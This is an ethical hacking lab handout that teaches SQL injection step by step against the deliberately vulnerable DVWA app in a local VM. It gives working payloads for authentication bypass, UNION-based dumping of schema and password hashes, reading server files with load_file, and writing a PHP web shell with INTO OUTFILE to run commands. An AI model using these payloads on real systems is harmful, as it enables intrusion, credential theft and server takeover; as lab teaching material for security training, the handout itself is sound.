SQL Injection exercises

Ethical Hacking lab exercise.

Note that Information contained in this document is for educational purposes.

.
+ Contents
1 Introduction.........................................................................................................................................1
1.1 What is SQL Injection?.................................................................................................................1
1.2 Possible Ramifications of SQL Injection.......................................................................................1
2 SQL Injection in Damn Vulnerable Web App.......................................................................................2
2.1 Setting up the Simple SQL injection with low level security........................................................2
2.2 Examine the PHP Source Code.....................................................................................................3
2.3 Simple numeric entry...................................................................................................................4
2.4 Check for handling of quotes.......................................................................................................5
2.5 Simple SQL “OR” injection:..........................................................................................................6
2.6 Finding the number of columns in the query...............................................................................7
2.7 Guessing field names in a database.............................................................................................7
2.8 Finding table names in a database...............................................................................................8
2.9 Find the first character in the database name : -.........................................................................9
2.10 Finding the table names..............................................................................................................9
2.11 Finding the SQL Version.............................................................................................................10
2.12 Find the current database user:.................................................................................................10
2.13 List the password hashes:..........................................................................................................10
2.14 Reading arbitrary files:...............................................................................................................11
2.15 Writing arbitrary files:................................................................................................................12
2.16 Remote Code execution:............................................................................................................12
3 Major exercise - Investigating WackoPicko........................................................................................14

.
.
 1 INTRODUCTION
1.1 WHAT IS SQL INJECTION?
SQL injection is an attack technique that exploits a security vulnerability occurring in the code a web
application. Injections can be used to obtain unauthorised access to the underlying data, structure, and
DBMS. It is currently one of the most common web application vulnerabilities. There are two types of
SQL injection: -

1. Plain
2. Blind

1. Plain SQL injection

With this type of injection, the SQL server responds with error messages about the SQL syntax. The web
page accepts data from a client and executes SQL queries without first validating the client’s input. The
attacker is then free to extract, modify, add, or delete content from the database.

2. Blind SQL Injection

Blind SQL injection is similar to plain SQL Injection except that when an attacker attempts to exploit an
application, rather then getting a useful error message, they get a generic page specified by the
developer. This makes exploiting a potential SQL Injection attack slightly more difficult.

1.2 POSSIBLE RAMIFICATIONS OF SQL INJECTION

SQL injection is extremely dangerous and can lead to one or more of the following: -

 Authentication Bypass: This attack allows an attacker to log on to an

application, potentially with administrative privileges, without supplying a valid
username and/or password.
 Information Disclosure: This attack allows an attacker to obtain, either directly
of indirectly, sensitive information that is contained in a database.
 Compromised Data Integrity: This attack involves the alteration of the contents
of a database.
 Compromised Availability of Data: This attack allows an attacker to delete
information with the intent to cause harm or delete log or audit information
that is contained in a database.
 Remote Command Execution: Performing command execution through a
database can allow an attacker to compromise the host operating system.

Note: - It is recommended that you copy and paste the SQL queries directly from this handout.

1|Page
 2 SQL INJECTION IN DAMN VULNERABLE WEB APP
DVWA is a Web application security teaching platform written by Ryan Dewhurst. It is an excellent
starting point for learning the basics.

2.1 SETTING UP THE SIMPLE SQL INJECTION WITH LOW LEVEL SECURITY

Damn Vulnerable Web Application (DVWA) has three different security settings. These correspond
to: -

Low -No effort has been made to secure the code.

Medium -Some effort has been made to secure the PHP code.
High -The code is (probably) as it should be written.

We will examine SQL injection with the setting at Low.

 Run the Web App virtual machine.

 From Firefox on your main Windows desktop, browse to http://192.168.1.100/phpmyadmin/

(log in as root/with a password of owaspbwa) and look at the structure of the databases and
the DVWA Database that we will be examining.

We can see that the database name is DVWA and also there are tables named “users” and
“guestbook”

 We can also see the values in the users database (the passwords are MD5 hashed).

 Browse to http://192.168.1.100/dvwa/login.php

 Log in as admin with a password of password.

2|Page
  Ensure that Security Level is set to Low

The next section will examine the menu option SQL injection.

This simulates the situation where the user simply enters a numeric user ID. This section is useful in that
it shows how simple SQL injection works. We will build up from the simple cases to doing more complex
injection commands.

2.2 EXAMINE THE PHP SOURCE CODE

In this case, we can examine the PHP source code directly using PHP filemanger.php

 Browse to http://192.168.1.100/filemanager/filemanager.php?p=

 Then browse to dvwa/vulnerabilities/sqli/source

You will see the PHP source code that runs for High, Medium and Low security.

 Examine low.php and you should see that there is no input filtering (see below).

3|Page
 $id = $_GET['id'];

$getid = "SELECT first_name, last_name FROM users WHERE user_id =

'$id'";

$result = mysql_query($getid) or die('<pre>' . mysql_error() .

'</pre>' );

We can see that no attempt has been made to secure the code.

The files can also be viewed from the web page using the View Source button that has been added.

 Back in Firefox, hit the View Source button (at the bottom right hand side of the page).

Note that the code that runs in DVWA can be viewed at any time using this method.

 By viewing the PHP file, we can see that the SQL query that will run is

SELECT first_name, last_name FROM users WHERE user_id = ‘$id’

Where user_id is what we enter in the text box.

Note: The View Source window also has a Compare button at the left hand bottom of the screen. This
will show the low/medium/high source code.

2.3 SIMPLE NUMERIC ENTRY

We will first examine how the system functions.

 Enter an ID of 1

4|Page
This gives an output of: -

ID: 1
First name: admin
Surname: admin

The source code is: -

SELECT first_name, last_name FROM users WHERE user_id = '$id'

This means that the executed SQL query can obtained by substituting 1 for $id

SELECT first_name, last_name FROM users WHERE user_id = ‘1’

Tutorial
Try entering simple values in the text box.

2.4 CHECK FOR HANDLING OF QUOTES

We will use something that looks benign to check for quote handling errors.

 Enter

O'Malley

This should give: -

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near 'Malley'' at line 1

The SQL query is: -

SELECT first_name, last_name FROM users WHERE user_id = ‘$id’

Meaning that the SQL query that is executed is the following: -

SELECT first_name, last_name FROM users WHERE user_id = ‘O’Malley’

We can see that everything after the single quote is being treated as a SQL request. Entering O'Malley
means that there are unclosed single quotes resulting in the error.

5|Page
2.5 SIMPLE SQL “OR” INJECTION:
We will first try a simple OR injection query. Note that -- indicates comment in MySQL and the ; means
end of line. The basic aim is to try to craft a value of $id that will ignore the real value and do a “1=1”.
This is useful when attacking a username/password combination where we want the query to essentially
ignore the password.

 Enter the following: -

' OR 1=1;--

Note that you must put a space at the end.

This should dump the entire database - which is a little unusual (if you examine the source code, you will
see that it loops around with all results).

Examining this, the original code is

SELECT first_name, last_name FROM users WHERE user_id = '$id'

By simple substitution,what will execute is: -

SELECT first_name, last_name FROM users WHERE user_id = 'a' OR '1=1';-- '

Tutorials
Other queries that dump the database are shown below. Build the SQL queries to show how they
function and write them underneath. Note the SQL query is the following: -

SELECT first_name, last_name FROM users WHERE user_id = '$id'

a' OR ''='
…………………………………………………………………………………….

a' OR 'x'='x';#
…………………………………………………………………………………….

' OR '1=1';--
…………………………………………………………………………………….

Note that the # also indicates a comment in MySQL

6|Page
2.6 FINDING THE NUMBER OF COLUMNS IN THE QUERY
When attacking, it can be useful to find the number of columns in the query (in this case there are two
first_name and last_name). This can be achieved by using the SQL Command ORDER BY.

It is a simple case of increasing the column number to order by and wait for an error. The SQL query we
are trying to build is similar to the following : -

SELECT first_name, last_name FROM users WHERE user_id = 'a' ORDER BY 1;#''

Try entering the following. The first two of the following will do nothing. The third one will give an error.

' ORDER BY 1#
' ORDER BY 2#
' ORDER BY 3#

You should see no error in the first two commands because the query has functioned correctly.

The error on the last command indicates that there are only two columns in the query. Since there are
two columns (first_name and last_name), the first two queries do not produce an error and it is
impossible to ORDER by column 3.

2.7 GUESSING FIELD NAMES IN A DATABASE

In this case, we know the field names but in most cases we will not, meaning that we will either have to
guess them or find some way of extracting them. Web developers tend to be logical (as taught by
textbooks and their tutors) meaning that field names can often be guessed easily.

 Enter

' OR firstname IS NULL#

The resulting query was :-

SELECT first_name, last_name FROM users WHERE user_id = '' OR firstname IS

NULL#

This should give an error.

 Enter

' OR first_name IS NULL#

7|Page
The resulting query was :-

SELECT first_name, last_name FROM users WHERE user_id = '' OR first_name IS

NULL #

This gives no error indicating that the command has been successful. The query effectively shows that
first_name is not NULL (i.e. it is “something”).

 Try

' OR first_name = 'Pablo'--

' OR first_name LIKE '%P%'--

Using this same technique, it may be possible to find the value of other fields (passwords, email
addresses…etc)? In more secure scenarios, we may wish to find user names. The SQL LIKE command
allows us examine the database by finding LIKE’s to a character (e.g. character P). Note that the % means
wildcard.

Tutorial
Experiment to try to find other user names.

2.8 FINDING TABLE NAMES IN A DATABASE

In a normal web application database, there will be many different tables – i.e. developer created and
also system tables. To be able to interrogate a system, it is usually necessary to find the table name.

 Try

' OR test.user_id IS NOT NULL#

This should return

Unknown column 'test.user_id' in 'where clause'

This indicates that there is no table named test. The syntax of the query is as follows: -

SELECT first_name, last_name FROM users WHERE user_id = '' OR test.user_id IS

NOT NULL#

8|Page
We are using the tablename.columnname format to help guess the table name. If we guess an
incorrect table name we will get an error. If, however, we have guessed the correct table name, the
query should not have an error.

 Try the following

' OR users.user_id IS NOT NULL #

There is no error ie. the database and table exist.

2.9 FIND THE FIRST CHARACTER IN THE DATABASE NAME : -

In an attempt to find the database name, we can use the LIKE and database(). Try the following: -

' OR database() LIKE 'A%' #

' OR database() LIKE 'B%';#
' OR database() LIKE 'C%';#
' OR database() LIKE 'D%';#

The above technique can be used to get each letter e.g. try D then “V%” etc... We now know that the
database is named DVWA.

2.10 FINDING THE TABLE NAMES

To investigate the PHP/MySQL system futher, The following SQL query will give us the table names in
the database “dvwa”.

SELECT first_name, last_name FROM users WHERE user_id = ‘' UNION SELECT
table_schema, table_name FROM information_schema.tables WHERE
table_schema LIKE 'dvwa’

 i.e. enter the following: -

' UNION SELECT table_schema, table_name FROM information_schema.tables

WHERE table_schema LIKE 'dvwa' #

This should give the database name and the database tables. Note: - all tables are dumped in this case
because of the loop in the PHP code.

9|Page
2.11 FINDING THE SQL VERSION
It is often useful to find the version of MySQL that is being used (syntax variations and limitations etc
exist with different versions). This SQL query returns the version:-

SELECT first_name, last_name FROM users WHERE user_id = '' UNION ALL
SELECT 1, @@version #

 Enter the following: -

' UNION SELECT 1, @@version#

2.12 FIND THE CURRENT DATABASE USER:

If we do manage to run our own code on the webserver, it is useful to know the context that our code is
running (e.g high such as root, admin or low privileges?). The following query gives us the current user.

SELECT first_name, last_name FROM users WHERE user_id = '' UNION ALL
SELECT system_user(),user() #

 i.e. Enter the following : -

' UNION ALL SELECT system_user(),user() #

2.13 LIST THE PASSWORD HASHES:

One obvious goal of an attacker is to obtain user passwords. If we can obtain the password for an
elevated privilege user, we could check to see if they have a database management program such as
PHPmyAdmin running. I.e. log in and see what can be configured or altered.
The following SQL query can be issued.

SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT
user, password FROM dvwa.users #

10 | P a g e
  i.e. enter the following : -

' UNION SELECT user, password FROM dvwa.users #

This will hopefully display the MD5 password hashes that can then be cracked with Cain, John the Ripper
or other password crackers. We will show how this can be achieved later in the handout.

Note: - Many, many databases contain unhashed passwords – this is very poor practice. If a hacker
gets “in”, they have ALL the passwords.

2.14 READING ARBITRARY FILES:

For an attacker, it can be very useful to have read access to files on the compromised machine. This can
lead to disclosure of information that helps the attacker to perform further attacks.

SELECT first_name, last_name FROM users WHERE user_id = ' UNION SELECT
load_file('/var/www/dvwa/.htaccess'), '1

 Enter the following: -

' UNION SELECT load_file('/var/www/dvwa/.htaccess'), '1

This should show us the .htaccess file which is the Apache Web Server configuration file. We could also
read any file that the SQL server has read rights to. There may be files such as .htpasswd, or some other
file that contains sensitive information. PHP files that access a SQL database will often have the
database password listed in the file. SQL injection will also allow us to view the .php file without the php
first being interpreted by the server.

 Enter the following (Note nothing will appear on screen).

' UNION SELECT load_file('/var/www/dvwa/config/config.inc.php'),'1#

This works without error, but there is nothing printed to the screen.

 Now view the page source however, you should find the file contents.

11 | P a g e
2.15 WRITING ARBITRARY FILES:
The ability to write files to the server means that an attacker can write web pages (e.g. deface the web
site) or even inject code files on to the server that they can access from a web browser (or other client).
The following will create a file on the server.

SELECT first_name, last_name FROM users WHERE user_id = 'UNION SELECT

'test', '123' INTO OUTFILE '/var/www/dvwa/temp/testing1.txt' --

 Enter the following: -

'UNION SELECT 'test', '123' INTO OUTFILE '/var/www/dvwa/temp/testing1.txt' --

 Browse to http://192.168.1.100/dvwa/temp/ and you should see the created file.

2.16 REMOTE CODE EXECUTION:

The “Holy Grail” of web application hacking is to be able to run arbitrary code on the server.
The following SQL query will create a file called shell.php.

SELECT first_name, last_name FROM users WHERE user_id = ' UNION SELECT '',
'<?PHP system($_GET["cmd"]); ?>' INTO OUTFILE
'/var/www/dvwa/temp/shell.php';#

 So inject the following: -

' UNION SELECT '', '<?PHP system($_GET["cmd"]); ?>' INTO OUTFILE

'/var/www/dvwa/temp/shell.php';#

 Now point your browser to the following

http://192.168.1.100/dvwa/shell.php?cmd=ls

12 | P a g e
We have just run a command on the remote server. We can run any linux command. From here we
could download and run files (backdoor, keylogger, etc.), change system settings, stop firewalls, stop
anti-virus, add system users, etc.

Note: this is only a simple shell. More powerful shells can be injected.

13 | P a g e
 3 MAJOR EXERCISE - INVESTIGATING WACKOPICKO
Wackopicko (http://192.168.1.100/WackoPicko/users/login.php) has a SQL injection vulnerability. Use
the vulnerability to dump all the usernames and passwords.

14 | P a g e